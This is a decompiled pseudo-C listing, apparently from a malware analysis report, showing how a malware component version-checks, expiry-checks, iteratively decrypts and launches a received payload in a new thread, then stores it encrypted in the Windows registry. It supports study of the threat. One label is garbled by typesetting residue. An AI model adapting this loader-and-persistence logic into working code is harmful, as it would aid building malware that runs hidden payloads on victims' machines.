payload_check *v2;
int expiration_date;
int current_version;
payload_check *v5;
payload_check *v6;
payload_check *v7;
int v8;
payload_check *v9;
int v10;
int v11;
payload_check *v12;
unsigned int v13;
int v14;
int received_version;
char *v16;
int v17;
int v18;
char v19;
int v20;
v16 = &v19;
v2 = a1;
EnterCriticalSection(...);
v20 = 0;
if (! check_payload_and_extract_header(v2)
|| (current_version = get_payload_version(),
received_version = extract_field_from_decrypted_header(v2, 0),
expiration_date = extract_field_from_decrypted_header(v5, 4),
v13 = extract_field_from_decrypted_header(v6, 8),
v14 = extract_field_from_decrypted_header(v7, 12),
(received_version & 0x7FFFFFFFu) <= (current_version & 0x7FFFFFFFu))
|| global_time_variable + get_total_time_elapsed() >= (unsigned
int)expiration_date )
goto @bfseries$FREE MEMORY and EXIT#;
if (control && v14 & 4 )
{
v9 = copy_payload_struc(v2);
v12 = v9;
while ((extract_field_from_decrypted_header(v9, 12) & 2) )
{
if (!(extract_field_from_decrypted_header(v9, 12) & 1) ||
! further_decrypt_payload(v11, v9) )
goto LABEL_9;
}
v18 = 0;
v17 = 0;
v16 = 0;
received_version = 0;
spawn_payload_thread((void *)(v9->size - 576), 1, (const void *) (v9->decrypted_payload + 64), 0, 0, 0, 0);
LABEL_9:
free_payload_check_struct(&v12);
}
v10 = v13;
if (!(v14 & 1) || v13 <= 0 ) {
if (( v14 & 2 ) & !v13) {
dword_9BBD30 = 0;
variable_payload_version = received_version;
clear_registry_value(4u, off_9B8DBE, 4);
clear_registry_value(4u, off_9B9076, 5);
variable_payload_check_struct = 0;
store_encrypted_payload_in_registry_if_payload();
}
goto FREE MEMORY_and_EXIT;
}
if (!further_decrypt_payload(v8, v2) ) {
FREE MEMORY_and_EXIT:
free_payload_check_struct(&a1);
goto EXIT;
}
call_GlobalFree((HGLOBAL)v2->decrypted_payload);
v2->decrypted_payload = 0;
dword_9BBD30 = v10;
variable_payload_version = received_version;
clear_registry_value(4u, off_9B8DBE, 4);
clear_registry_value(4u, off_9B9076, 5);
free_payload_check_struct((void *)off_9B9844);
variable_payload_check_struct = (int)v2;
a1 = 0;
store_encrypted_payload_in_registry_if_payload();
free_payload_check_struct(&a1);
EXIT:
LeaveCriticalSection(...);
}
SOURCE
LISTING 19: Iterative payload decryption